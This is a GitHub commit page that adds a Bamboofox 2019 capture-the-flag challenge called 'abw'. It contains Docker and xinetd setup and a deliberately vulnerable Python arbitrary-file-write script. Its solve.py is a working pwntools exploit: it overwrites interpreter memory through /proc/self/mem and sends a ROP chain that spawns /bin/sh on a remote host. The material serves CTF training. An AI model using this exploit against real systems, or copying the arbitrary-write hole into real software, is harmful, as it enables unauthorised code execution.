Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 9a18875

Browse files
committed
arbitrary write
1 parent 1ef0191 commit 9a18875

File tree

9 files changed

+135
-0
lines changed

9 files changed

+135
-0
lines changed

‎Bamboofox2019_abw/Dockerfile‎

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
FROM ubuntu:18.04
2+
MAINTAINER Billy
3+
RUN apt-get update
4+
RUN apt-get upgrade -y
5+
RUN apt-get install xinetd -y
6+
RUN apt-get install python3 -y
7+
RUN useradd -m abw
8+
COPY ./share /home/abw
9+
COPY ./xinetd /etc/xinetd.d/abw
10+
COPY ./flag /home/abw/flag
11+
RUN chmod 774 /tmp
12+
RUN chmod -R 774 /var/tmp
13+
RUN chmod -R 774 /dev
14+
RUN chmod -R 774 /run
15+
RUN chmod 1733 /tmp /var/tmp /dev/shm
16+
RUN chown -R root:root /home/abw
17+
CMD ["/usr/sbin/xinetd","-dontfork"]

‎Bamboofox2019_abw/docker-compose.yml‎

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
abw:
2+
build: ./
3+
environment:
4+
- OLDPWD=/home
5+
- XDG_RUNTIME_DIR=/run/user/1000
6+
- LESSOPEN=| /usr/bin/lesspipe %s
7+
- LANG=en_US
8+
- SHLVL=1
9+
- SHELL=/bin/bash
10+
- FLAG=/
11+
- ROOT=/
12+
- TCP_PORT=12345
13+
- PORT=12345
14+
- X_PORT=12345
15+
- SERVICE=abw
16+
- XPC_FLAGS=0x0
17+
- TMPDIR=/tmp
18+
- RBENV_SHELL=bash
19+
ports:
20+
- "12345:12345"
21+
expose:
22+
- "12345"

‎Bamboofox2019_abw/flag‎

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
BAMBOOFOX{XXX}

‎Bamboofox2019_abw/share/abw‎

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
#!/usr/bin/env python3
2+
3+
print( "Write File")
4+
filename = input("File Name :")
5+
with open(filename,"wb") as file:
6+
seek = int(input("Seek :"))
7+
file.seek(seek)
8+
file.write(bytes.fromhex(input("Data (hex):")[:20]))

‎Bamboofox2019_abw/share/python3.6‎

4.32 MB
Binary file not shown.

‎Bamboofox2019_abw/share/python3.i64‎

34.4 MB
Binary file not shown.

‎Bamboofox2019_abw/share/run.sh‎

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
#!/bin/bash
2+
exec 2> /dev/null
3+
timeout 60 /home/abw/abw
4+

‎Bamboofox2019_abw/share/solve.py‎

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
#!/usr/bin/python2
2+
#-*- coding:utf-8 -*-
3+
4+
from pwn import *
5+
from pwn import sleep
6+
context.log_level = "critical"
7+
context.binary = "/usr/bin/python3"
8+
elf = context.binary
9+
10+
# io = process("./abw")
11+
io = remote("34.82.101.212", 10010)
12+
13+
io.sendlineafter(" :", "/proc/self/mem")
14+
15+
offset = 0x4b0f80
16+
io.sendlineafter(" :", str(offset))
17+
18+
# gdb.attach(io, '''b *0x4b0f78\nc''')
19+
data = asm('''
20+
mov rsi, rsp
21+
mov rdx, r12
22+
pop rdi
23+
syscall
24+
ret
25+
''').encode('hex')
26+
print(len(data))
27+
assert len(data) <= 20
28+
io.sendlineafter(":", data)
29+
sleep(0.01)
30+
31+
from struct import pack
32+
33+
p = lambda x : pack('Q', x)
34+
35+
IMAGE_BASE_0 = 0x0000000000400000 # 577e6f13d080302dd4c6e653134fee0234c7b4b4a9b03c849f6d0b176aa379b2
36+
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
37+
38+
rop = ''
39+
rop += 'padding0円'
40+
41+
rop += rebase_0(0x0000000000020d7c) # 0x0000000000420d7c: pop r13; ret;
42+
rop += '//bin/sh'
43+
rop += rebase_0(0x0000000000020bb0) # 0x0000000000420bb0: pop r12; ret;
44+
rop += rebase_0(0x00000000005b4ea0)
45+
rop += rebase_0(0x000000000015c64d) # 0x000000000055c64d: mov qword ptr [r12], r13; pop r12; pop r13; pop r14; ret;
46+
rop += p(0xdeadbeefdeadbeef)
47+
rop += p(0xdeadbeefdeadbeef)
48+
rop += p(0xdeadbeefdeadbeef)
49+
rop += rebase_0(0x0000000000020d7c) # 0x0000000000420d7c: pop r13; ret;
50+
rop += p(0x0000000000000000)
51+
rop += rebase_0(0x0000000000020bb0) # 0x0000000000420bb0: pop r12; ret;
52+
rop += rebase_0(0x00000000005b4ea8)
53+
rop += rebase_0(0x000000000015c64d) # 0x000000000055c64d: mov qword ptr [r12], r13; pop r12; pop r13; pop r14; ret;
54+
rop += p(0xdeadbeefdeadbeef)
55+
rop += p(0xdeadbeefdeadbeef)
56+
rop += p(0xdeadbeefdeadbeef)
57+
rop += rebase_0(0x0000000000021872) # 0x0000000000421872: pop rdi; ret;
58+
rop += rebase_0(0x00000000005b4ea0)
59+
rop += rebase_0(0x000000000002159a) # 0x000000000042159a: pop rsi; ret;
60+
rop += rebase_0(0x00000000005b4ea8)
61+
rop += rebase_0(0x00000000000026c1) # 0x00000000004026c1: pop rdx; ret;
62+
rop += rebase_0(0x00000000005b4ea8)
63+
rop += rebase_0(0x0000000000021095) # 0x0000000000421095: pop rax; ret;
64+
rop += p(0x000000000000003b)
65+
rop += rebase_0(0x000000000009a009) # 0x000000000049a009: syscall;
66+
io.sendline(rop)
67+
68+
io.interactive()

‎Bamboofox2019_abw/xinetd‎

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
service abw
2+
{
3+
disable = no
4+
type = UNLISTED
5+
wait = no
6+
server = /home/abw/run.sh
7+
socket_type = stream
8+
protocol = tcp
9+
user = abw
10+
port = 12345
11+
flags = REUSE
12+
per_source = 5
13+
rlimit_cpu = 3
14+
nice = 18
15+
}

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /